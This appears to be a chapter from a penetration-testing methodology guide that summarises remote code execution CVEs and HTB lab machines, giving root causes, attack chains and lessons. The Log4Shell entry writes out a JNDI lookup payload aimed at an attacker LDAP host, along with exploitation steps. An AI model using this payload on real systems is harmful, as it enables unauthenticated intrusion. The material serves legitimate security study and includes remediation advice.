RCE Case Studies
Checklist
- For each case, read the primary source before trusting any summary.
- Identify the bug class, then map it to the entry points chapter.
- Note the exact precondition that made it exploitable.
- Extract one reusable lesson per case.
- Save the PoC repo link for your own lab.
A note on accuracy: for recent CVEs, confirm the technical details against the vendor advisory, the NVD entry, and the referenced research before you rely on them. The point of this chapter is the pattern and the lesson, not a copy of someone else’s writeup. Primary sources to check: OffSec blog, Wiz blog, Synack blog, ProjectDiscovery blog, HackerOne Hacktivity, and the GitHub PoC repos linked from each advisory.
CVEs
Log4Shell, CVE 2021 44228
- Affected software: Apache Log4j 2, versions before 2.15.0 (with follow up fixes through 2.17.1).
- Root cause: Log4j evaluated
${jndi:...}lookups inside logged strings. A logged attacker value triggered a JNDI lookup to an attacker controlled server, which returned a malicious class that Java loaded and ran. - Exploitation steps: send
${jndi:ldap://attacker/a}in any field that gets logged (User-Agent, headers, username). Confirm the lookup out of band. Serve a gadget or class from your LDAP or RMI server. - Impact: unauthenticated RCE across a huge range of products.
- Remediation: upgrade Log4j, set
log4j2.formatMsgNoLookups, remove the JndiLookup class. - Lesson: logging is an attack surface. Any sink that interprets logged content is dangerous.
React2Shell, CVE 2025 55182
- Affected software: as named in the advisory. Verify the exact product and versions in the official entry.
- How to study it: read the OffSec analysis and the Wiz deep dive, plus the bug bounty writeup reporting it on a NASA subdomain. Map the described primitive to the matching entry point class in this methodology.
- Lesson: a widely used component with a code execution sink becomes a mass exploitation event once a PoC drops. Watch disclosure feeds and patch fast.
CVE 2025 33053, WebDAV RCE with .url file delivery
- Affected software: Windows WebDAV handling, per the advisory.
- Pattern: a crafted
.urlfile delivered to a victim points at a WebDAV path that runs an attacker controlled binary, turning file delivery into execution. - Lesson: file format and protocol handlers are RCE surface. Delivery plus a trusted handler equals execution.
CVE 2025 14558, FreeBSD rtsold command injection
- Affected software: the FreeBSD
rtsoldrouter solicitation daemon, per the advisory. - Pattern: untrusted input reaches a command, a classic OS command injection in a system daemon.
- Lesson: command injection is not only a web bug. Daemons that shell out are just as exposed.
CVE 2025 8110, Gogs Git symlink and sshCommand injection
- Affected software: Gogs, per the advisory.
- Pattern: Git features (symlinks and
sshCommand) abused to reach code execution, a reminder that Git hosting exposes many sinks. - Lesson: feature rich Git servers have a large sink surface. Review hooks, symlink handling, and command options.
CVE 2025 63721, HummerRisk SnakeYAML deserialization
- Affected software: HummerRisk, per the advisory.
- Pattern: unsafe SnakeYAML loading of attacker YAML instantiates dangerous types, the Java YAML deserialization path from the entry points chapter.
- Lesson:
yaml.loadstyle APIs that build arbitrary objects are deserialization sinks. Use safe loaders.
CVE 2025 64050, REDAXO CMS authenticated RCE
- Affected software: REDAXO CMS, per the advisory.
- Pattern: an authenticated user reaches a code or command sink, common in CMS admin features.
- Lesson: authenticated RCE still matters. Admin and editor roles are a realistic attacker position, especially with credential reuse.
HTB machines
These are study targets. Use the official and community writeups for full detail. The one line below is the shape of each.
Pterodactyl
- Entry point: LFI.
- Chain: LFI to pearcmd technique to a PAM bypass for a shell.
- Lesson: LFI is rarely the end. Known local files and tricks like pearcmd turn a read into execution.
Kobold
- Entry point: unauthenticated RCE in MCPJam Inspector.
- Chain: reach the exposed service and trigger the code execution sink.
- Lesson: new AI and MCP tooling ships with classic RCE sinks. Treat it like any other web service.
OneTwoSeven
- Entry point: a chroot symlink escape.
- Chain: symlink escape then an nf_tables use after free for privilege escalation.
- Lesson: sandbox escapes plus kernel bugs are a realistic path from limited code execution to root.
Planning
- Entry point: Grafana RCE.
- Chain: Grafana to a container, then a container escape.
- Lesson: dashboards and monitoring tools are RCE surface, and containers are not a trust boundary by default.
GiveBack
- Entry point: PHP object injection.
- Chain: object injection to PHP-CGI abuse.
- Lesson: unserialize plus a reachable gadget equals RCE, and PHP-CGI quirks widen the path.
Analytics
- Entry point: Metabase pre auth RCE.
- Chain: Metabase to a Docker escape.
- Lesson: a pre auth RCE in a popular analytics tool plus a weak container boundary is a full compromise.
Reactor
- Entry point: as described in the writeup.
- Lesson: study how the author moved from first access to code execution, and which sink they used.
CCTV
- Entry point: as described in the writeup.
- Lesson: device and camera style web apps often have command injection in network features.
Editorial
- Entry point: SSRF leading to further access.
- Lesson: SSRF is a frequent first link in a chain to RCE. Follow where the internal request can reach.
Takeaway
Collect primary sources, reproduce each in a lab, and fold the reusable lesson back into your own checklist. Continue to Tools.